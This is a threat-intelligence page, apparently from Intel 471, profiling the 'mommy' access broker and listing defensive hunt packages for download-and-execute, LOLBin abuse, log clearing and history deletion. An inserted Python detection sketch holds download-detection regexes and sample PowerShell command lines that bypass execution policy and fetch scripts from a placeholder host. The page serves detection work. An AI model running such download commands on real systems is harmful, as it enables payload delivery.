mommy Access Broker | Intel 471

mommy Access Broker

Jun 27, 2025

Threat Overview - mommy Access Broker

mommy, also known as "Miyako" or "Miya," is an emerging and sophisticated cyber threat actor that has gained attention since 2024 due to their advanced cyber-espionage capabilities and active involvement in high-profile attacks. Operating within underground cybercrime markets, mommy specializes in providing illicit services, including access to compromised networks and the sale of sensitive data. Their activities indicate a focus on espionage, data exfiltration, and exploiting high-value targets, particularly government entities, telecommunications companies, and critical infrastructure providers.

The threat group has been observed selling unauthorized access to networks and systems, enabling other threat actors to opportunistically access compromised devices for further exploitation or to deploy malicious payloads. The access broker has targeted a range of industries, including government institutions in the United States, critical infrastructure providers, and telecommunications. With a particular focus on monetizing stolen access and information, the access broker is part of a growing trend of "access-as-a-service" models, in which cybercriminals commodify network access for profit. These activities point to the increasing commercialization of cybercrime, where stolen credentials and system vulnerabilities are sold to the highest bidder, often nation-state actors. Additionally, the broker's focus on maintaining anonymity and privacy in their operations poses a significant challenge to cybersecurity efforts and makes them a formidable threat to organizations worldwide.

In January 2025, a copy of the access broker’s "Guide", previously offered for sale, was uploaded to VirusTotal. The guide outlines detailed methodologies for conducting intrusions, maintaining persistence, expanding initial footholds, and monetizing compromised access and data. Intel 471’s TITAN reporting, cited in the "Intel 471 References" section below, provides invaluable insights into the access broker’s activities, affiliations, and operational links to other groups, often surfacing intelligence well before any public leaks or reporting. This advanced visibility ensures greater preparedness and a deeper understanding of how the broker operates within the broader cybercriminal ecosystem.

Mommy Access Broker Hunt Package Collection


TITAN References:

Get your FREE Community Account today on the HUNTER Platform and get access to behavioral threat hunting content for your SIEM, EDR, NDR, and XDR platforms!

Related Hunt Packages

CURL/WGET Download and Execute - Potential Payload Download Followed by Execution

This Threat Hunt package identifies the use of curl or wget followed by the potential execution of the downloaded payload via a scripting interpreter, such as Bash, Python, Perl, or others.
ACCESS HUNT PACKAGE

Desktopimgdownldr LOLBin - Download File

This use case is meant to identify desktopimgdownldr.exe, a binary intended for customizing the lock screen or desktop background images, being used to download files from remote locations.
ACCESS HUNT PACKAGE

Common Suspicious PowerShell Execution Argument Techniques - Bypass and Unrestricted Policies

This Hunt Package is designed to identify suspicious PowerShell execution arguments associated with the execution policies "Unrestricted" and "Bypass". Based on research, the use of "Bypass" is more common in malicious executions; however, "Unrestricted" should still be monitored for abuse, such as insider threats. As such, this Hunt Package provides both a behavior and a detection, weighted by the relative frequency with which Bypass and Unrestricted are observed in executions. The flags and parameters included in the query logic search for potentially malicious activity that deviates from standard practice within a specific environment. This can help the analyst discover abnormal or harmful events that leverage PowerShell for various purposes, such as launching attacks or maintaining persistence.
ACCESS HUNT PACKAGE

CronJobs Pointed at Hidden Directories - Linux

This identifies Cron Jobs utilizing hidden locations to store scripts and executables commonly used for persistence on Linux machines.
ACCESS HUNT PACKAGE

hh.exe LOLBin - Download File

This use case is meant to identify the HTML Help executable program (hh.exe) downloading files remotely.
ACCESS HUNT PACKAGE

PowerShell History Modification or Deletion

Adversaries may attempt to clear the command history of compromised hosts to conceal the actions that they have performed during an attack. This content will detect if PowerShell's history was cleared, disabled, or modified.
ACCESS HUNT PACKAGE

Living Off The Land Technique - Esentutl.exe

This package is designed to identify when the Microsoft Windows native binary esentutl.exe is used to perform actions that may be abnormal and possibly malicious.
ACCESS HUNT PACKAGE

Usage of chmod to Enable Execution - Potential Payload Staging

This hunt package identifies instances where the 'chmod' command is used to modify file permissions, specifically focusing on changes that grant executable rights. By correlating these events with user contexts and known file paths, the package aims to highlight potentially malicious activities, such as the preparation of a system for exploitation or the setup of persistence mechanisms by unauthorized users.
ACCESS HUNT PACKAGE

sshd Process Executing Commands as root User - Potential Abuse or RCE

This Hunt Package looks for bash or shell commands being executed as part of the sshd process. Commands are typically associated with a specific user when logged in via ssh; however, when the sshd process is exploited or otherwise abused, the command can appear to run as the sshd process user, executing code from the exploit attempt. This process chain was most recently observed during staged exploitation of CVE-2024-3094. This Hunt Package covers the believed process tree based on a staged exploit for the vulnerability in XZ, tracked as CVE-2024-3094, released by GitHub user "amlweems".
ACCESS HUNT PACKAGE

Methods for Downloading Files with PowerShell

This threat hunt package identifies instances where PowerShell is being used to download files from external sources, a common technique used in malware delivery and lateral movement. The hunt examines various methods by which PowerShell can be leveraged for file downloads, including the use of cmdlets such as Invoke-WebRequest (iwr), Invoke-RestMethod (irm), and Start-BitsTransfer (sbt), as well as direct utilization of .NET classes like System.Net.WebClient and HttpClient. The package also checks for potentially suspicious use of aliases (curl, wget) and other common executables that invoke PowerShell scripts to download malicious payloads.
ACCESS HUNT PACKAGE
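As an added illustration of the two PowerShell hunt packages above (execution-policy arguments and download methods), the following Python sketch is not Intel 471's query logic; it applies the same ideas to constructed process-creation events, weighting "Bypass" above "Unrestricted" and adding weight when a download primitive named in the package description is present. The event format and scoring thresholds are assumptions for this example.

```python
"""Sketch of detection logic for suspicious PowerShell command lines.

Flags execution-policy overrides (Bypass weighted higher than Unrestricted)
and the download primitives listed in the hunt package description.
Sample events below are constructed for this example, not real telemetry.
"""
import re

# -ExecutionPolicy accepts abbreviations such as -ep, -ex and -exec.
POLICY_RE = re.compile(r"-e[px]\w*\s+(bypass|unrestricted)", re.I)

# Download cmdlets, aliases and .NET classes from the package description.
DOWNLOAD_RE = re.compile(
    r"invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b"
    r"|start-bitstransfer|\bsbt\b|net\.webclient|httpclient"
    r"|\bcurl\b|\bwget\b",
    re.I,
)


def classify(cmdline):
    """Return (execution policy, download method) found in one command line."""
    policy = POLICY_RE.search(cmdline)
    download = DOWNLOAD_RE.search(cmdline)
    return (policy.group(1).lower() if policy else None,
            download.group(0).lower() if download else None)


def score(cmdline):
    """Assumed weights: Bypass 2, Unrestricted 1, any download method +2."""
    policy, downloader = classify(cmdline)
    total = {"bypass": 2, "unrestricted": 1, None: 0}[policy]
    if downloader:
        total += 2
    return total


def hunt(events, threshold=3):
    """Return event ids scoring at or above the threshold, highest first."""
    ranked = sorted(((score(e["cmdline"]), e["id"]) for e in events), reverse=True)
    return [eid for s, eid in ranked if s >= threshold]


# Constructed sample process-creation events (hypothetical hosts and URLs).
SAMPLE_EVENTS = [
    {"id": 1, "cmdline": "powershell.exe -ep bypass -c \"iwr http://example.invalid/a.ps1 -OutFile a.ps1\""},
    {"id": 2, "cmdline": "powershell.exe -ExecutionPolicy Unrestricted -File C:\\scripts\\backup.ps1"},
    {"id": 3, "cmdline": "powershell.exe -NoProfile -c \"Get-Process\""},
    {"id": 4, "cmdline": "powershell.exe -c \"(New-Object Net.WebClient).DownloadString('http://example.invalid/x')\""},
]

if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        print(event["id"], score(event["cmdline"]), classify(event["cmdline"]))
```

Tune the threshold to the environment: event 2 is the kind of administrative "Unrestricted" use the package says to keep monitoring rather than alert on outright.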

Wevtutil Cleared Log

This use case is designed to detect when "wevtutil" is used to clear logs, potentially to obscure malicious events that occurred prior to the cleanup.
ACCESS HUNT PACKAGE

PowerShell Download and Execute Dropper Behavior - Separate Command Calls

This package identifies the use of PowerShell to pull down a payload and execute it. This is similar to activity observed in association with SysJoker's Dropper for Windows where the PowerShell commands are broken up as individual execution calls.
ACCESS HUNT PACKAGE

Microsoft SQL executing LOLBins

This package identifies when the Microsoft SQL executable runs Living Off the Land Binaries (LOLBins) which is a characteristic of a compromised Microsoft SQL Server.
ACCESS HUNT PACKAGE

Linux Command History Removal

This use case is meant to identify command-line parameters indicative of the deletion of command history on Linux. This can be done in an attempt to evade detection and erase adversarial activities.
ACCESS HUNT PACKAGE
